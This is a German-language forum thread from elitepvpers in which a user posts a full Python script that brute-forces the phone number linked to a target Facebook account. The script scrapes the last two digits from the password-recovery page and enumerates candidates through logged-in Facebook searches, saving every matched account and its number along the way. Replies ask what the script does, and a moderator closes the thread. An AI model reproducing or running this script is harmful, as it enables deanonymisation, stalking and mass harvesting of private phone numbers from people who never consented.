Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > Coding Releases
You last visited: Today at 06:19

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[Phyton] Facebook Phone Number Brute Force

Discussion on [Phyton] Facebook Phone Number Brute Force within the Coding Releases forum part of the Coders Den category.

Closed Thread
 
Old   #1
 
_--_Sh1t_--_'s Avatar
 
elite*gold: 0
Join Date: Apr 2014
Posts: 209
Received Thanks: 58
Exclamation [Phyton] Facebook Phone Number Brute Force

Hallo,

wer kann helfen das Script zum laufen zu bringen ?

Man braucht nur den Facebook Namen (Usernamen)!

Der Nutzer muss eine Handy Nummer hinterlegt haben!

Code:
Facebook - Account's Phone Number Brute-Force

Affected ver    facebook.com
&
m.facebook.com
Tested on    facebook.com & m.facebook.com

Description:
Brute Forces Any Facebook Account's Phone Number if it Got a Linked Phone # in it.
+ Saves All Acounts with their Phone Number Until it Reaches Targets Phone Number
its a 2 in 1 Tool
Usage info:
You Should Only Know The Country Code of The Target and You Should Own a Facebook Account
1.Country Code=> US (+1) , Greece (+30) ... etc
2.Facebook Account
The Tool Runs Threads For Speed Purposes


Secret Code:

import urllib2
import re
import threading
import sys

 
manual_cookie = raw_input("Get Cookie From https://m.facebook.com/login/identify?ctx=recover After Submitting Your Target: ");
user = raw_input("Username: ")
a = urllib2.build_opener()
a.addheaders.append(('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'))
a.addheaders.append(('Cookie',manual_cookie))
cop = a.open("http://m.facebook.com/login/identify?ctx=recover","ctx=recover&email="+user).read()
lasttwonumbers = re.findall('<ul style="margin:0px"><li>(.*?)</li></ul>',cop)
print "Last 2 #s of Target's Phone: "+lasttwonumbers[0][-2:]

cc = raw_input("Country Code: ")
nb_bt = raw_input("#s Between Country Code & Last 2 #s: ")

file_save = open('out.txt','a')
opener = urllib2.build_opener()
url = 'http://www.facebook.com/search/more?q=%2B'
zeroz = 0
manual_cookie = raw_input("Logged in Full Facebook Cookie: ")
print "[+] Threads are Set To Default To 5\n[+] Bruting Started"


def brute(manual_cookie,number):
   page = url + number
   opener.addheaders.append(('Cookie', manual_cookie))
   get = opener.open(page)
   html = get.read()
   acc = re.findall('<div class="_zs fwb" data-bt="&#123;"ct":"title"&#125;"><a .*>(.*)<span class="_138">.*</span></a><span class="_5dgp">.*</span></div>', html)
   accc = re.findall('<div class="_zs fwb" data-bt="&#123;"ct":"title"&#125;"><a .*>(.*)</a><span class="_5dgp">.*</span></div>', html)
   if acc:
      if re.findall(user, html):
         print "\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n"
         file_save.write("\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n\n\n")         
         print "Good Luck"
         sys.exit()
      else:
         print "[+] " + acc[0] + " => +" + str(number)
         file_save.write("[+] " + acc[0] + " => +" + str(number) + "\n")
   elif accc:
      if re.findall(user, html):
         print "\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n"
         file_save.write("\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n\n\n")         
         print "Good Luck"
         sys.exit()
      else:
         print "[+] " + accc[0] + " => +" + str(number)
         file_save.write("[+] " + accc[0] + " => +" + str(number) + "\n")

   else:
      print "[-] => +" + str(number)
      
   
while int(len(str(zeroz))) < int(nb_bt)+1:
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz))+str(lasttwonumbers[0][-2:])
   t=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+1))+str(lasttwonumbers[0][-2:])
   to=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+2))+str(lasttwonumbers[0][-2:])
   tt=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+3))+str(lasttwonumbers[0][-2:])
   tth=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+4))+str(lasttwonumbers[0][-2:])
   tf=threading.Thread(target=brute,args=(manual_cookie,number,))
   t.start()
   to.start()
   tt.start()
   tth.start()
   tf.start()
   t.join()
   to.join()
   tt.join()
   tth.join()
   tf.join()
   zeroz += 5
   while 1:
      break


file_save.close()
_--_Sh1t_--_ is offline  
Old 05/09/2016, 19:01   #2
 
alpines's Avatar
 
elite*gold: 60
Join Date: Aug 2009
Posts: 2,256
Received Thanks: 815
Warum schaust du dir keine Standardnummern für das jeweilige Land an und schaust welche Zahlen wechseln dürfen und die wechselst du dann dementsprechend.
alpines is offline  
Old 05/09/2016, 21:28   #3
 
_--_Sh1t_--_'s Avatar
 
elite*gold: 0
Join Date: Apr 2014
Posts: 209
Received Thanks: 58
@ geht bei dir das Script ?
_--_Sh1t_--_ is offline  
Old 05/09/2016, 22:01   #4
 
alpines's Avatar
 
elite*gold: 60
Join Date: Aug 2009
Posts: 2,256
Received Thanks: 815
Quote:
Originally Posted by _--_Sh1t_--_ View Post
@ geht bei dir das Script ?
Ich habe kein Python installiert und ich dachte das dein Problem darinbesteht valide Nummern zu generieren.
alpines is offline  
Old 05/09/2016, 22:20   #5
 
_--_Sh1t_--_'s Avatar
 
elite*gold: 0
Join Date: Apr 2014
Posts: 209
Received Thanks: 58
Quote:
Originally Posted by alpines View Post
Ich habe kein Python installiert und ich dachte das dein Problem darinbesteht valide Nummern zu generieren.
Na das macht das Script von alleine (Die Phone NUmber raus zu bekommen)


Mir gehts darum das viele Syntax Fehler vorhanden sind....
_--_Sh1t_--_ is offline  
Old 05/11/2016, 12:17   #6
 
Synoooo's Avatar
 
elite*gold: 0
Join Date: Apr 2016
Posts: 7
Received Thanks: 1
Quote:
Originally Posted by _--_Sh1t_--_ View Post
Na das macht das Script von alleine (Die Phone NUmber raus zu bekommen)


Mir gehts darum das viele Syntax Fehler vorhanden sind....
hä? is doch deiner oder nicht?
Synoooo is offline  
Old 05/11/2016, 22:26   #7
 
_--_Sh1t_--_'s Avatar
 
elite*gold: 0
Join Date: Apr 2014
Posts: 209
Received Thanks: 58
Quote:
Originally Posted by Synoooo View Post
hä? is doch deiner oder nicht?

neee gefunden!!!

nur wusste jetzt nicht welche Section ich es posten sollte.
_--_Sh1t_--_ is offline  
Old 03/25/2017, 18:21   #8
 
elite*gold: 26
Join Date: Jan 2017
Posts: 62
Received Thanks: 14
was macht das script nun genau?
TRVR. is offline  
Old 03/26/2017, 14:22   #9
dotCom
 
Devsome's Avatar
 
elite*gold: 12400
The Black Market: 104/0/0
Join Date: Mar 2009
Posts: 15,875
Received Thanks: 4,380
Quote:
Originally Posted by TRVR. View Post
was macht das script nun genau?
Quote:
Description:
Brute Forces Any Facebook Account's Phone Number if it Got a Linked Phone # in it.
+ Saves All Acounts with their Phone Number Until it Reaches Targets Phone Number
its a 2 in 1 Tool
Steht doch da oben.
Dennoch mache ich hier mal zu.

#closed
Devsome is offline  
Closed Thread


Similar Threads Similar Threads
German Phone Number - Help
08/07/2015 - Off Topic - 5 Replies
Hi,i am trying to create a paysafecard account with EUR currency and i tried with Germany but i don't get that phone number ... I saw that Berlin geographic code is 030 so i tried with it but it didn't work ... can someone explain me how this works ? Or just simply text a number here ... http://i.imgur.com/eoQ6pJX.png
How i get a Korean Phone Number?
11/02/2013 - Elsword - 4 Replies
Hello How i can make a Korean Phone number? I need a Korean Phone number for Elsword KR? How can i get a Number?
Joymax phone number ^_^
07/22/2009 - Silkroad Online - 10 Replies
Well I was just surfing around watching movies on youtube, and found this guy that called joymax (a german guy) and well in the comments I found the number to joymax. I thought it was a fake number but I used Skype and called it and well, they answered with "Welcome to joymax company" or something. Well I can't hold this number for myself so if anyone want it +8224208854 You can call them thru skype =P (for 0.017€/min )
JOYMAX.co phone number
03/03/2009 - Silkroad Online - 3 Replies
look what i found :)) no more answers with 1 week delay Welcome to RGNames.com's WHOIS data service. The Data in RGnames' WHOIS database is provided by RGNames for information purpose, and to assist persons in obtaining information about or related to a domain name registration record. RGNames does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes ant that, under no circumstances will you use this Data to: (1)...
Any One Have SRo Phone Number
05/16/2007 - Silkroad Online - 4 Replies
Plz i need SRo Phone number my credit card got hacked and they abnd all my players from all servers



All times are GMT +2. The time now is 06:19.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.